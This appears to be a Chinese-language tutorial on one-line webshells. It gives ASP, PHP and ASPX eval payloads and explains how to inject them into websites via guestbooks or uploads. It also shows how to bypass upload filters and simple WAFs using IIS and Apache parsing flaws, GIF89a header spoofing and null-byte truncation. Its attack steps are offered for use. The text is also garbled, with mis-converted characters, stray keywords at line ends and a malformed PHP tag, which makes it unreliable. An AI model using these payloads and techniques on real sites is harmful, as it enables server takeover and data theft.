一句話木馬——php
一句話木馬短小精悍,並且功能強大,隱蔽性很是好,在入侵中扮演着強大的做用。nginx
黑客在註冊信息的電子郵箱或者我的主頁等插入相似以下代碼:web
<%execute request(「value」)%> 其中value是值,因此你能夠更改本身的值,前面的request就是獲取這個值 <%eval request(「value」)%>(如今比較常見,並且字符少,對錶單字數有限制的地方特別有用)。shell
當知道了數據庫的url,就能夠利用本地一張網頁進行鏈接獲得webshell,(不知道數據庫也能夠,只要知道<%eval request(「value」)%>這個文件被插入到哪個asp文件裏就能夠),這就被稱爲一句話木馬,基於B/S結構。數據庫
寫法——apache
Asp一句話:服務器
<%eval request(「xxx」)%>函數
Php 一句話:測試
<%php @eval($_POST[xxx]);?>網站
Aspx一句話:
<%@ Page Languag=」xxx」%>
<%eval(Request.Item[「xxx」])%>
鏈接木馬的客戶端——
中國菜刀,中國砍刀,lanker一句話客戶端,zv新型php一句話木馬客戶端
木馬的使用技巧——
首先找到數據庫是asp格式的網站,而後以留言板或者發表文章的方式把一句話添加到asp數據庫,或者加進asp網頁,記住!咱們的目的是把一句話<%execute request("xxx")% >添加到數據庫不管論任何方式!而後打開客戶端,填上加入了一句話的asp文件,或者是asp網頁,而後進入此網站服務器。
示例:網頁上傳webshell
上傳大馬後打開上傳的路勁xx.asp,並輸入密碼
webshell就拿到了
木馬的製做——
C32下作一句話》打開c32,把圖片放裏面,寫入一句話保存,退出
小馬與大馬的區別——
小馬體積小,容易隱藏,隱蔽性強,最重要在於與圖片結合一塊兒上傳以後能夠利用nginx或IS的解析漏洞來運行,不過功能少,通常只有上傳等功能。大馬體積比較大通常50K以上。功能也多,通常都包括提權命令,磁盤管理,數據庫鏈接藉口,執行命令甚至有些以具有自帶提權功能和壓縮,解壓縮網站程序的功能。這種馬隱蔽性很差,而大多代碼如不加密的話不少殺毒廠商開始追殺此類程序
經過加密webshell過簡單的waf
變量經過函數加載進來,也就是打亂變量,從新組合,使變量複雜化,繞過防火牆
文件解析漏洞——
解析漏洞主要說的是一些特殊文件被iis,apache,nginx在某種狀況下解釋成腳本文件格士的漏洞。
Iis解析漏洞
1.目錄解析
當網站下創建文件夾的名字爲.asp,.asa的文件夾,其目錄內的任何擴展名的文件都被iis看成asp文件來解析並執行,如建立目錄/xxx.asp/xx.jpg xx.jpg被看成asp文件來執行,若是黑客能夠控制活上傳文件夾路徑,就能夠無論上傳後的圖片改不更名都能拿shell。
2.符號後面不被解析——(可以使用抓包軟件改後綴)
在這種狀況下,分號後面的不被解析,也就是說xxx.asp;.jpg會被服務器當作是xxx.jpg
Apache解析漏洞
1.apache是從右到左開始判斷解析,若是爲不可識別解析,就再往左判斷,如xxx.php.owf.rar ,」.owf」和」.rar」這兩種後綴是apache解析不了的,apache就會把xxx.php.owf.rar解析成php.
怎麼去判斷是否是合法的後綴就是這個漏洞利用關鍵,測試時把常見的後綴都寫上,去測試是否是合法,任意不識別的後綴,逐級向上識別
文件頭欺騙漏洞——
在一句話木馬內容前面加入gif89a,如:gif89a <%eval request(「xx」)%> 而後將木馬保存爲圖片的格式,如xxx.jpg,xx.gif文件頭欺騙能夠用來繞過簡單的waf。
00截斷——
找到上傳漏洞後,打開選擇上傳的一句話木馬,打開抓包軟件,進行00截斷,把抓到的數據包改成%00
選取%00
變成16進制
放包
複製路經後,web訪問測試,用菜刀鏈接放大馬